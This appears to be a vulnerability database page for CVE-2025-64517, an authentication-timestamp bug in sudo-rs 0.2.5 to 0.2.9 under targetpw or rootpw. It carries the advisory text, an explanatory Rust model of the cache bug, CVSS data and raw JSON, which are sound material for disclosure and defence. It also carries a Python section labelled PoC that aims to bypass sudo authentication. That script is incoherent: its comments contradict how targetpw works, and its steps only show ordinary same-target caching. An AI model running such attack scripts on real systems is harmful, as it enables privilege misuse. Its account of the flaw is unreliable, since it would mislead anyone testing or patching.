Security Vulnerability Report
CVE-2025-64517 CVSS 4.4 MEDIUM

CVE-2025-64517

Published: 2025-11-12 22:15:50
Last Modified: 2026-04-15 00:35:42

Description

sudo-rs is a memory safe implementation of sudo and su written in Rust. With `Defaults targetpw` (or `Defaults rootpw`) enabled, the password of the target account (or root account) instead of the invoking user is used for authentication. sudo-rs starting in version 0.2.5 and prior to version 0.2.10 incorrectly recorded the invoking user’s UID instead of the authenticated-as user's UID in the authentication timestamp. Any later `sudo` invocation on the same terminal while the timestamp was still valid would use that timestamp, potentially bypassing new authentication even if the policy would have required it. A highly-privileged user (able to run commands as other users, or as root, through sudo) who knows one password of an account they are allowed to run commands as, would be able to run commands as any other account the policy permits them to run commands for, even if they don't know the password for those accounts. A common instance of this would be that a user can still use their own password to run commands as root (the default behaviour of `sudo`), effectively negating the intended behaviour of the `targetpw` or `rootpw` options. Version 0.2.10 contains a patch for the issue. Versions prior to 0.2.5 are not affected, since they do not offer `Defaults targetpw` or `Defaults rootpw`.
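
The timestamp mix-up described above, as an added Rust model (not sudo-rs source code and not part of the original record). `PwMode`, `Cache` and the function names are hypothetical, the UIDs are constructed, and timestamp expiry is left out. It shows why the default mode is unaffected, while under `targetpw` a later invocation for a different target reuses the record without a prompt.

```rust
// Simplified model of sudo's per-terminal credential cache. Not sudo-rs source:
// every name below is hypothetical, and the timestamp timeout is not modelled.
use std::collections::HashSet;

type Uid = u32;

#[derive(Clone, Copy, Debug)]
enum PwMode { Invoking, Target, Root } // default, `Defaults targetpw`, `Defaults rootpw`

/// UID whose password the policy demands for this invocation.
fn auth_uid(mode: PwMode, invoking: Uid, target: Uid) -> Uid {
    match mode {
        PwMode::Invoking => invoking,
        PwMode::Target => target,
        PwMode::Root => 0,
    }
}

struct Cache {
    fixed: bool,                  // false: 0.2.5 to 0.2.9 behaviour, true: 0.2.10
    records: HashSet<(u32, Uid)>, // (tty, uid) timestamps assumed still valid
}

impl Cache {
    /// Returns true if a password prompt is required. On a prompt the model
    /// assumes the correct password is entered and records a timestamp.
    fn run(&mut self, tty: u32, mode: PwMode, invoking: Uid, target: Uid) -> bool {
        let needed = auth_uid(mode, invoking, target);
        // The bug: the record carried the invoking UID, not the UID that authenticated.
        let recorded = if self.fixed { needed } else { invoking };
        // insert() is true only when no matching record existed, i.e. a prompt happened.
        self.records.insert((tty, recorded))
    }
}

/// Constructed scenario: uid 1000 runs a command as uid 1001, then as root (uid 0),
/// on the same terminal. Returns whether the second invocation prompted.
fn second_run_prompts(fixed: bool, mode: PwMode) -> bool {
    let mut cache = Cache { fixed, records: HashSet::new() };
    cache.run(1, mode, 1000, 1001); // first run always prompts
    cache.run(1, mode, 1000, 0)
}

fn main() {
    for mode in [PwMode::Invoking, PwMode::Target, PwMode::Root] {
        println!("{:?}: pre-0.2.10 prompts={} 0.2.10 prompts={}", mode,
                 second_run_prompts(false, mode), second_run_prompts(true, mode));
    }
}
```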

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

sudo-rs >= 0.2.5, < 0.2.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64517 PoC - sudo-rs Authentication Timestamp Bypass
# Environment: sudo-rs 0.2.5-0.2.9 with Defaults targetpw or rootpw configured
# Attack Goal: Bypass authentication to run commands as other users
import subprocess
import time


def exploit_cve_2025_64517():
    """
    Exploitation steps:
    1. Attacker knows password for user A
    2. Policy allows user A to run commands as user B
    3. Attacker runs: sudo -u userB command
    4. System prompts for user A's password (due to targetpw)
    5. Attacker enters user A's password, command executes as userB
    6. Timestamp records user A's UID instead of userB's UID
    7. Attacker runs another command as userB
    8. System uses cached timestamp, bypasses authentication
    """
    # Step 1: Initial authentication with targetpw
    # This authenticates with userA's password but timestamp records userA's UID
    subprocess.run(['sudo', '-u', 'userB', '-k'])  # Clear timestamp
    result1 = subprocess.run(['sudo', '-u', 'userB', 'id'], capture_output=True)
    # Expected: Prompts for password, executes as userB

    # Step 2: Subsequent command bypasses authentication
    # Timestamp still valid, system uses userA's UID from timestamp
    result2 = subprocess.run(['sudo', '-u', 'userB', 'whoami'], capture_output=True)
    # Expected: No password prompt, executes as userB
    return result1, result2


def verify_vulnerability():
    """
    Verification: Check if second sudo call prompts for password
    If no prompt: vulnerability exists
    If prompt: vulnerability patched
    """
    print("Testing CVE-2025-64517...")
    print("If timestamp bypass works, second command should not require password")
    # Check sudo-rs version
    result = subprocess.run(['sudo', '--version'], capture_output=True, text=True)
    if 'sudo-rs' in result.stdout:
        print("sudo-rs detected")
        return True


if __name__ == '__main__':
    verify_vulnerability()

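References

https://github.com/trifectatechfoundation/sudo-rs/commit/8423fd986c3fa58b357f238c0db5e54baca5255d.
https://github.com/trifectatechfoundation/sudo-rs/releases/tag/v0.2.10
https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-q428-6v73-fc4q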

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64517", "sourceIdentifier": "[email protected]", "published": "2025-11-12T22:15:50.460", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "sudo-rs is a memory safe implementation of sudo and su written in Rust. With `Defaults targetpw` (or `Defaults rootpw`) enabled, the password of the target account (or root account) instead of the invoking user is used for authentication. sudo-rs starting in version 0.2.5 and prior to version 0.2.10 incorrectly recorded the invoking user’s UID instead of the authenticated-as user's UID in the authentication timestamp. Any later `sudo` invocation on the same terminal while the timestamp was still valid would use that timestamp, potentially bypassing new authentication even if the policy would have required it. A highly-privileged user (able to run commands as other users, or as root, through sudo) who knows one password of an account they are allowed to run commands as, would be able to run commands as any other account the policy permits them to run commands for, even if they don't know the password for those accounts. A common instance of this would be that a user can still use their own password to run commands as root (the default behaviour of `sudo`), effectively negating the intended behaviour of the `targetpw` or `rootpw` options. Version 0.2.10 contains a patch for the issue. Versions prior to 0.2.5 are not affected, since they do not offer `Defaults targetpw` or `Defaults rootpw`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://github.com/trifectatechfoundation/sudo-rs/commit/8423fd986c3fa58b357f238c0db5e54baca5255d.", "source": "[email protected]"}, {"url": "https://github.com/trifectatechfoundation/sudo-rs/releases/tag/v0.2.10", "source": "[email protected]"}, {"url": "https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-q428-6v73-fc4q", "source": "[email protected]"}]}}